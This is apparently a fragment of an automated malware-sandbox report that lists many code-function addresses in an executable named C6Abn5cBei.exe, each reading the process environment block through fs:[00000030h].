                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230274 mov eax, dword ptr fs:[00000030h]9_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01208243 mov eax, dword ptr fs:[00000030h]9_2_01208243
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01208243 mov ecx, dword ptr fs:[00000030h]9_2_01208243
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184260 mov eax, dword ptr fs:[00000030h]9_2_01184260
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184260 mov eax, dword ptr fs:[00000030h]9_2_01184260
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184260 mov eax, dword ptr fs:[00000030h]9_2_01184260
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117826B mov eax, dword ptr fs:[00000030h]9_2_0117826B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov ecx, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012162A0 mov eax, dword ptr fs:[00000030h]9_2_012162A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE284 mov eax, dword ptr fs:[00000030h]9_2_011BE284
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE284 mov eax, dword ptr fs:[00000030h]9_2_011BE284
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01200283 mov eax, dword ptr fs:[00000030h]9_2_01200283
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01200283 mov eax, dword ptr fs:[00000030h]9_2_01200283
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01200283 mov eax, dword ptr fs:[00000030h]9_2_01200283
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902A0 mov eax, dword ptr fs:[00000030h]9_2_011902A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902A0 mov eax, dword ptr fs:[00000030h]9_2_011902A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A2C3 mov eax, dword ptr fs:[00000030h]9_2_0118A2C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902E1 mov eax, dword ptr fs:[00000030h]9_2_011902E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902E1 mov eax, dword ptr fs:[00000030h]9_2_011902E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011902E1 mov eax, dword ptr fs:[00000030h]9_2_011902E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216500 mov eax, dword ptr fs:[00000030h]9_2_01216500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE53E mov eax, dword ptr fs:[00000030h]9_2_011AE53E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254500 mov eax, dword ptr fs:[00000030h]9_2_01254500
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190535 mov eax, dword ptr fs:[00000030h]9_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188550 mov eax, dword ptr fs:[00000030h]9_2_01188550
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188550 mov eax, dword ptr fs:[00000030h]9_2_01188550
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B656A mov eax, dword ptr fs:[00000030h]9_2_011B656A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B656A mov eax, dword ptr fs:[00000030h]9_2_011B656A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B656A mov eax, dword ptr fs:[00000030h]9_2_011B656A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012005A7 mov eax, dword ptr fs:[00000030h]9_2_012005A7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012005A7 mov eax, dword ptr fs:[00000030h]9_2_012005A7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012005A7 mov eax, dword ptr fs:[00000030h]9_2_012005A7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE59C mov eax, dword ptr fs:[00000030h]9_2_011BE59C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B4588 mov eax, dword ptr fs:[00000030h]9_2_011B4588
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182582 mov eax, dword ptr fs:[00000030h]9_2_01182582
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182582 mov ecx, dword ptr fs:[00000030h]9_2_01182582
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A45B1 mov eax, dword ptr fs:[00000030h]9_2_011A45B1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A45B1 mov eax, dword ptr fs:[00000030h]9_2_011A45B1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011865D0 mov eax, dword ptr fs:[00000030h]9_2_011865D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA5D0 mov eax, dword ptr fs:[00000030h]9_2_011BA5D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA5D0 mov eax, dword ptr fs:[00000030h]9_2_011BA5D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE5CF mov eax, dword ptr fs:[00000030h]9_2_011BE5CF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE5CF mov eax, dword ptr fs:[00000030h]9_2_011BE5CF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC5ED mov eax, dword ptr fs:[00000030h]9_2_011BC5ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC5ED mov eax, dword ptr fs:[00000030h]9_2_011BC5ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011825E0 mov eax, dword ptr fs:[00000030h]9_2_011825E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE5E7 mov eax, dword ptr fs:[00000030h]9_2_011AE5E7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01206420 mov eax, dword ptr fs:[00000030h]9_2_01206420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8402 mov eax, dword ptr fs:[00000030h]9_2_011B8402
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8402 mov eax, dword ptr fs:[00000030h]9_2_011B8402
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8402 mov eax, dword ptr fs:[00000030h]9_2_011B8402
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA430 mov eax, dword ptr fs:[00000030h]9_2_011BA430
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117C427 mov eax, dword ptr fs:[00000030h]9_2_0117C427
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E420 mov eax, dword ptr fs:[00000030h]9_2_0117E420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E420 mov eax, dword ptr fs:[00000030h]9_2_0117E420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117E420 mov eax, dword ptr fs:[00000030h]9_2_0117E420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A245A mov eax, dword ptr fs:[00000030h]9_2_011A245A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120C460 mov ecx, dword ptr fs:[00000030h]9_2_0120C460
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117645D mov eax, dword ptr fs:[00000030h]9_2_0117645D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE443 mov eax, dword ptr fs:[00000030h]9_2_011BE443
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AA470 mov eax, dword ptr fs:[00000030h]9_2_011AA470
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AA470 mov eax, dword ptr fs:[00000030h]9_2_011AA470
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AA470 mov eax, dword ptr fs:[00000030h]9_2_011AA470
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120A4B0 mov eax, dword ptr fs:[00000030h]9_2_0120A4B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B44B0 mov ecx, dword ptr fs:[00000030h]9_2_011B44B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011864AB mov eax, dword ptr fs:[00000030h]9_2_011864AB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011804E5 mov ecx, dword ptr fs:[00000030h]9_2_011804E5
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180710 mov eax, dword ptr fs:[00000030h]9_2_01180710
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B0710 mov eax, dword ptr fs:[00000030h]9_2_011B0710
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC700 mov eax, dword ptr fs:[00000030h]9_2_011BC700
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B273C mov eax, dword ptr fs:[00000030h]9_2_011B273C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B273C mov ecx, dword ptr fs:[00000030h]9_2_011B273C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B273C mov eax, dword ptr fs:[00000030h]9_2_011B273C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FC730 mov eax, dword ptr fs:[00000030h]9_2_011FC730
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC720 mov eax, dword ptr fs:[00000030h]9_2_011BC720
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC720 mov eax, dword ptr fs:[00000030h]9_2_011BC720
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180750 mov eax, dword ptr fs:[00000030h]9_2_01180750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2750 mov eax, dword ptr fs:[00000030h]9_2_011C2750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2750 mov eax, dword ptr fs:[00000030h]9_2_011C2750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B674D mov esi, dword ptr fs:[00000030h]9_2_011B674D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B674D mov eax, dword ptr fs:[00000030h]9_2_011B674D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B674D mov eax, dword ptr fs:[00000030h]9_2_011B674D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188770 mov eax, dword ptr fs:[00000030h]9_2_01188770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190770 mov eax, dword ptr fs:[00000030h]9_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01204755 mov eax, dword ptr fs:[00000030h]9_2_01204755
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120E75D mov eax, dword ptr fs:[00000030h]9_2_0120E75D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012347A0 mov eax, dword ptr fs:[00000030h]9_2_012347A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122678E mov eax, dword ptr fs:[00000030h]9_2_0122678E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011807AF mov eax, dword ptr fs:[00000030h]9_2_011807AF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120E7E1 mov eax, dword ptr fs:[00000030h]9_2_0120E7E1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118C7C0 mov eax, dword ptr fs:[00000030h]9_2_0118C7C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011847FB mov eax, dword ptr fs:[00000030h]9_2_011847FB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011847FB mov eax, dword ptr fs:[00000030h]9_2_011847FB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012007C3 mov eax, dword ptr fs:[00000030h]9_2_012007C3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A27ED mov eax, dword ptr fs:[00000030h]9_2_011A27ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A27ED mov eax, dword ptr fs:[00000030h]9_2_011A27ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A27ED mov eax, dword ptr fs:[00000030h]9_2_011A27ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2619 mov eax, dword ptr fs:[00000030h]9_2_011C2619
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119260B mov eax, dword ptr fs:[00000030h]9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119260B mov eax, dword ptr fs:[00000030h]9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119260B mov eax, dword ptr fs:[00000030h]9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119260B mov eax, dword ptr fs:[00000030h]9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119260B mov eax, dword ptr fs:[00000030h]9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119260B mov eax, dword ptr fs:[00000030h]9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119260B mov eax, dword ptr fs:[00000030h]9_2_0119260B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE609 mov eax, dword ptr fs:[00000030h]9_2_011FE609
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118262C mov eax, dword ptr fs:[00000030h]9_2_0118262C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B6620 mov eax, dword ptr fs:[00000030h]9_2_011B6620
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8620 mov eax, dword ptr fs:[00000030h]9_2_011B8620
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E627 mov eax, dword ptr fs:[00000030h]9_2_0119E627
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124866E mov eax, dword ptr fs:[00000030h]9_2_0124866E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124866E mov eax, dword ptr fs:[00000030h]9_2_0124866E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119C640 mov eax, dword ptr fs:[00000030h]9_2_0119C640
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B2674 mov eax, dword ptr fs:[00000030h]9_2_011B2674
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA660 mov eax, dword ptr fs:[00000030h]9_2_011BA660
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA660 mov eax, dword ptr fs:[00000030h]9_2_011BA660
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184690 mov eax, dword ptr fs:[00000030h]9_2_01184690
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184690 mov eax, dword ptr fs:[00000030h]9_2_01184690
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B66B0 mov eax, dword ptr fs:[00000030h]9_2_011B66B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC6A6 mov eax, dword ptr fs:[00000030h]9_2_011BC6A6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012006F1 mov eax, dword ptr fs:[00000030h]9_2_012006F1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012006F1 mov eax, dword ptr fs:[00000030h]9_2_012006F1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA6C7 mov ebx, dword ptr fs:[00000030h]9_2_011BA6C7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA6C7 mov eax, dword ptr fs:[00000030h]9_2_011BA6C7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h]9_2_011FE6F2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h]9_2_011FE6F2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h]9_2_011FE6F2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE6F2 mov eax, dword ptr fs:[00000030h]9_2_011FE6F2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120892A mov eax, dword ptr fs:[00000030h]9_2_0120892A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0121892B mov eax, dword ptr fs:[00000030h]9_2_0121892B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178918 mov eax, dword ptr fs:[00000030h]9_2_01178918
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01178918 mov eax, dword ptr fs:[00000030h]9_2_01178918
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE908 mov eax, dword ptr fs:[00000030h]9_2_011FE908
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FE908 mov eax, dword ptr fs:[00000030h]9_2_011FE908
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120C912 mov eax, dword ptr fs:[00000030h]9_2_0120C912
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01224978 mov eax, dword ptr fs:[00000030h]9_2_01224978
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01224978 mov eax, dword ptr fs:[00000030h]9_2_01224978
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120C97C mov eax, dword ptr fs:[00000030h]9_2_0120C97C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01200946 mov eax, dword ptr fs:[00000030h]9_2_01200946
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C096E mov eax, dword ptr fs:[00000030h]9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C096E mov edx, dword ptr fs:[00000030h]9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C096E mov eax, dword ptr fs:[00000030h]9_2_011C096E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A6962 mov eax, dword ptr fs:[00000030h]9_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A6962 mov eax, dword ptr fs:[00000030h]9_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A6962 mov eax, dword ptr fs:[00000030h]9_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012089B3 mov esi, dword ptr fs:[00000030h]9_2_012089B3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012089B3 mov eax, dword ptr fs:[00000030h]9_2_012089B3
